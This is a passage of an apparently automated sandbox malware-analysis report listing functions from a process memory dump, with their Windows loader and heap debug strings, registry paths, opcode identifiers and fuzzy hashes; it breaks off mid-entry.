                                                                                                                                                                                • Instruction Fuzzy Hash: 58B1CE75A45351AFE711DF50CCC0B5BB7F8EB48760F408929FA50EBA40DBB4E8488B92
                                                                                                                                                                                Function 3332A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                                                                • Opcode ID: 4d6efe82c3f4677c76bd1e759389aac828b07b2123834780c95cc20efde4aa69
                                                                                                                                                                                • Instruction ID: 56b6369ab5e38dba2334eb37d34abff72524d06bdd872e9bb0a06b7dd426e667
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d6efe82c3f4677c76bd1e759389aac828b07b2123834780c95cc20efde4aa69
                                                                                                                                                                                • Instruction Fuzzy Hash: E4A15B75D516299FDB21DF64CC88B9AB7B8EF44710F1081EAE908EB250DB359E88CF50
                                                                                                                                                                                Function 3340B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3340B3AA
                                                                                                                                                                                • GlobalizationUserSettings, xrefs: 3340B3B4
                                                                                                                                                                                • TargetNtPath, xrefs: 3340B3AF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                • API String ID: 0-505981995
                                                                                                                                                                                • Opcode ID: 32728d843febbb6791c0debe675e8d30412a4eccbe3dbea20ce38a3e32295f01
                                                                                                                                                                                • Instruction ID: d2ac5690c65d6cef87b9ad800f8e1145ec77e4e89c5dec7ee64208c328f610aa
                                                                                                                                                                                • Opcode Fuzzy Hash: 32728d843febbb6791c0debe675e8d30412a4eccbe3dbea20ce38a3e32295f01
                                                                                                                                                                                • Instruction Fuzzy Hash: C5616172E41729ABDB21DF54DC88B99B7B8AF04718F4141E9E508A7250CB74DE84CF98
                                                                                                                                                                                Function 3332F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • HEAP: , xrefs: 3338E442
                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 3338E435
                                                                                                                                                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3338E455
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                • API String ID: 0-1340214556
                                                                                                                                                                                • Opcode ID: 19afa4204fa1ab2fbc3759033c326c1bcecb3a4332899caf0e7e6b2db186052c
                                                                                                                                                                                • Instruction ID: a5f24ea29ab940b0c79fae9431834aafe3d865544cde0be2a031550966bbe017
                                                                                                                                                                                • Opcode Fuzzy Hash: 19afa4204fa1ab2fbc3759033c326c1bcecb3a4332899caf0e7e6b2db186052c
                                                                                                                                                                                • Instruction Fuzzy Hash: 1451F135A45784AFE712CFA8C884B5ABBF8EF04744F08C1A4E981CB662D774EE14CB51
                                                                                                                                                                                Function 33351514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 3339A3A7
                                                                                                                                                                                • LdrpCompleteMapModule, xrefs: 3339A39D
                                                                                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 3339A396
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                • API String ID: 0-1676968949
                                                                                                                                                                                • Opcode ID: d03b1a5e3fb6bbc7bf4f14f54089406aeff2e52f57622caaa7803929f979a69b
                                                                                                                                                                                • Instruction ID: 3424bd0aed024e082fef30047890d7fdc7f0dc8b228da80e7833c4181f31cc13
                                                                                                                                                                                • Opcode Fuzzy Hash: d03b1a5e3fb6bbc7bf4f14f54089406aeff2e52f57622caaa7803929f979a69b
                                                                                                                                                                                • Instruction Fuzzy Hash: C251DD75E40741DBFB118F68C984F5A77E8AB04764F18CA94F8929B7E2DB74E940CB40
                                                                                                                                                                                Function 333DD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • HEAP: , xrefs: 333DD79F
                                                                                                                                                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 333DD7B2
                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 333DD792
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                • API String ID: 0-3815128232
                                                                                                                                                                                • Opcode ID: 4a0cf6bb58b0579e77cd7693e3accb0719ef6c0f24bca4ec1dd602022cb485af
                                                                                                                                                                                • Instruction ID: 3844807e6fb669019c8aaf80f27fd627ca9d2ff0cca447f0766961b8a778ed5c
                                                                                                                                                                                • Opcode Fuzzy Hash: 4a0cf6bb58b0579e77cd7693e3accb0719ef6c0f24bca4ec1dd602022cb485af
                                                                                                                                                                                • Instruction Fuzzy Hash: E851147A540350CEF360EE2AC84077277E9EF45284F94C889F4D5CB685DA36E847DB60
                                                                                                                                                                                Function 3332753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                • API String ID: 0-1151232445
                                                                                                                                                                                • Opcode ID: a09034d23643d780f89bd9950740375a6608465be3650676f6c85f458ac48b62
                                                                                                                                                                                • Instruction ID: 077d20aa34dee95e6c1a561580ac9d50866b9925f48f3f48ae54db46e2ba9515
                                                                                                                                                                                • Opcode Fuzzy Hash: a09034d23643d780f89bd9950740375a6608465be3650676f6c85f458ac48b62
                                                                                                                                                                                • Instruction Fuzzy Hash: D24118786803408FEB15CE18C8E0765BBE4AF01349F68C4AAE485CFA57DA74D44DCB61
                                                                                                                                                                                Function 3333A1E3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 3333A229
                                                                                                                                                                                • @S03, xrefs: 3333A268
                                                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 3333A21B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @S03$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                • API String ID: 0-1386918536
                                                                                                                                                                                • Opcode ID: 7422522d97a347cc07b61899d6041ed3b8e16ee57efc6ce2e25a637b9b3de9c3
                                                                                                                                                                                • Instruction ID: a42144058a4054db0eef8f8617b2f6acfcb6db7cf9513dad2c9fc09862674763
                                                                                                                                                                                • Opcode Fuzzy Hash: 7422522d97a347cc07b61899d6041ed3b8e16ee57efc6ce2e25a637b9b3de9c3
                                                                                                                                                                                • Instruction Fuzzy Hash: BC41E274A49B44DBEB01CFA9C880B9977B8FF46760F14C0A5EC44DB2A1E736D950CB10
                                                                                                                                                                                Function 333BB214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 333BB2B2
                                                                                                                                                                                • GlobalFlag, xrefs: 333BB30F
                                                                                                                                                                                • @, xrefs: 333BB2F0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                • API String ID: 0-4192008846
                                                                                                                                                                                • Opcode ID: 1153a51f3cb7634dae146592e3ac13001286ebc46a954cde066b1aa5ea969415
                                                                                                                                                                                • Instruction ID: d0bf3d1076d4334a135bf6cf016131274f5fd8f903048981bcf88e2fed925063
                                                                                                                                                                                • Opcode Fuzzy Hash: 1153a51f3cb7634dae146592e3ac13001286ebc46a954cde066b1aa5ea969415
                                                                                                                                                                                • Instruction Fuzzy Hash: E3316DB1E01209AEDB00DF95DC80AEEBBBCEF44744F448469E605EB551DBB49A44CBA0
                                                                                                                                                                                Function 33361527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpInitializeTls, xrefs: 333A1851
                                                                                                                                                                                • minkernel\ntdll\ldrtls.c, xrefs: 333A185B
                                                                                                                                                                                • DLL "%wZ" has TLS information at %p, xrefs: 333A184A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                • API String ID: 0-931879808
                                                                                                                                                                                • Opcode ID: a9ac1a4f1a71d0f4f011cc8f86f749dd8ae0f3413f3da6c7510cc0e0f3174296
                                                                                                                                                                                • Instruction ID: cdc75e5f4ea27a481feffc104201fc8846e28eda2f95aae8209107ce5ea640e1
                                                                                                                                                                                • Opcode Fuzzy Hash: a9ac1a4f1a71d0f4f011cc8f86f749dd8ae0f3413f3da6c7510cc0e0f3174296
                                                                                                                                                                                • Instruction Fuzzy Hash: 3D312171E10300AFE710DF59CCD5B6AF6ECEB40768F018499E282F7280EBB0AD098790
                                                                                                                                                                                Function 333B85AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 333B85DE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                • API String ID: 0-702105204
                                                                                                                                                                                • Opcode ID: 7ff113296f393c9fdce53c8461b90d682a3aae60ad9aab65cc627aacc796a367
                                                                                                                                                                                • Instruction ID: 995e71baa8ec0f67351c1678c31160f5e7e97e5b9f812fbb659d2e0b51c04e67
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ff113296f393c9fdce53c8461b90d682a3aae60ad9aab65cc627aacc796a367
                                                                                                                                                                                • Instruction Fuzzy Hash: BB012B76E013485FDF206F11DC84B667BB5EF41752F448498E641BFCA2CF209891CEA8
                                                                                                                                                                                Function 333451C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@
                                                                                                                                                                                • API String ID: 0-149943524
                                                                                                                                                                                • Opcode ID: 0d26a58720a14fde5e73e3a54ce430776b557678011dfb0e837d50910b14f020
                                                                                                                                                                                • Instruction ID: 142aa789026dd640e94961971ae615957fd56e34e47e2767fd992c4a83526c33
                                                                                                                                                                                • Opcode Fuzzy Hash: 0d26a58720a14fde5e73e3a54ce430776b557678011dfb0e837d50910b14f020
                                                                                                                                                                                • Instruction Fuzzy Hash: 6232ACB8A483118BE714CF15C880B7EB7E5EF88754F54C92EF9858B290EB34D944CB92
                                                                                                                                                                                Function 33335622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: d1a5d3e851ffe0939ac041ee1de8aeb3c917fd3063a08b5278611a94cdf8a6d4
                                                                                                                                                                                • Instruction ID: 41d97f1404c0c4b242a49c65b474547850051a02829d990f5344b3f17354c071
                                                                                                                                                                                • Opcode Fuzzy Hash: d1a5d3e851ffe0939ac041ee1de8aeb3c917fd3063a08b5278611a94cdf8a6d4
                                                                                                                                                                                • Instruction Fuzzy Hash: A2319C31A42B02EFE7469F25C980B8AF7A9BF45764F44D125E94197E50DB74E821CB80
                                                                                                                                                                                Function 333B174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$AddD
                                                                                                                                                                                • API String ID: 0-2525844869
                                                                                                                                                                                • Opcode ID: cac739eb6c3ea26cf8debf7db59a772cf4f45837e1de74910793636bd48168ec
                                                                                                                                                                                • Instruction ID: 22a888c68d935537c4e12e78fbc4c70f1852a41d23bb473ef150c2ac196edd48
                                                                                                                                                                                • Opcode Fuzzy Hash: cac739eb6c3ea26cf8debf7db59a772cf4f45837e1de74910793636bd48168ec
                                                                                                                                                                                • Instruction Fuzzy Hash: DFA168B6908340AFE714CF14C885BABB7E9FF84704F448A2EF995C7650E770E9058B62
                                                                                                                                                                                Function 333AE372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                                                                                • Opcode ID: 3b89ed2ceb069ec68920b04875b1bc7bec60509050e28c46ccc5ac4a4bd700eb
                                                                                                                                                                                • Instruction ID: a22274a03c7bdb1a49467b27d4fba03bba64f5c32cfacad4f7c5965184bfe527
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b89ed2ceb069ec68920b04875b1bc7bec60509050e28c46ccc5ac4a4bd700eb
                                                                                                                                                                                • Instruction Fuzzy Hash: 37616BB5E423089FDB14CFACD880AADB7F9FF44340F54806AE559EB661EA30D940CB60
                                                                                                                                                                                Function 3340B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RedirectedKey, xrefs: 3340B60E
                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3340B5C4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                                                • API String ID: 0-1388552009
                                                                                                                                                                                • Opcode ID: a61e5272c5b8640500d5c3a5333d030b6346e2d95edb04d45f5b0fa5d26f07a0
                                                                                                                                                                                • Instruction ID: 90d2c4d3d1747bd5a4bf5fbdb831a456994d423e06788075b3d3780bc2b2970e
                                                                                                                                                                                • Opcode Fuzzy Hash: a61e5272c5b8640500d5c3a5333d030b6346e2d95edb04d45f5b0fa5d26f07a0
                                                                                                                                                                                • Instruction Fuzzy Hash: 6161D4B5D01219EFDB11DFA4C888ADEBBB8FB48714F54806AE805E7240D7749A45CFA4
                                                                                                                                                                                Function 3334F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: $$$
                                                                                                                                                                                • API String ID: 3446177414-233714265
                                                                                                                                                                                • Opcode ID: 198a177815d7a2b423ecba891f51705577a538c42866ec9ac790c6a87440e0ae
                                                                                                                                                                                • Instruction ID: 44279f20e79a6eb80eb8f43b951b0f74f81bd636a72b57551ada44903c09212e
                                                                                                                                                                                • Opcode Fuzzy Hash: 198a177815d7a2b423ecba891f51705577a538c42866ec9ac790c6a87440e0ae
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C61CF75E41749CFEB20CFA4CA80BADBBF1BF44714F18C169E515ABA51CB78A940CB90
                                                                                                                                                                                Function 333C314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                • API String ID: 0-118005554
                                                                                                                                                                                • Opcode ID: 916c263a1f7793d76647d8fa9eece5feca4ad7456cb6e1c7408a0f3c81f60628
                                                                                                                                                                                • Instruction ID: 26b7d120e479344abd011e8d7ebe1f7494dc2be97cf675ebb06930d9e91910d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 916c263a1f7793d76647d8fa9eece5feca4ad7456cb6e1c7408a0f3c81f60628
                                                                                                                                                                                • Instruction Fuzzy Hash: A831DE756487808BD301DF68D880B1AB7E8EF84720F048869E855CB380EB39DD05CB53
                                                                                                                                                                                Function 333306CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 23$ 23
                                                                                                                                                                                • API String ID: 0-1981344183
                                                                                                                                                                                • Opcode ID: 073821aeab32d0ab68428ddc28591cb1374296d4e61ef6f1d0e9a9ff0288957e
                                                                                                                                                                                • Instruction ID: 52583ccaefc01a3de44b3fd2e83c335d8d9ae2ef0cbf587d28387ba0be47be4d
                                                                                                                                                                                • Opcode Fuzzy Hash: 073821aeab32d0ab68428ddc28591cb1374296d4e61ef6f1d0e9a9ff0288957e
                                                                                                                                                                                • Instruction Fuzzy Hash: AD31A236A067059BD711DE14C880EDB7BE9AFC56B0F05C529FC96E7220EA38DC158BA1
                                                                                                                                                                                Function 333631BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .Local\$@
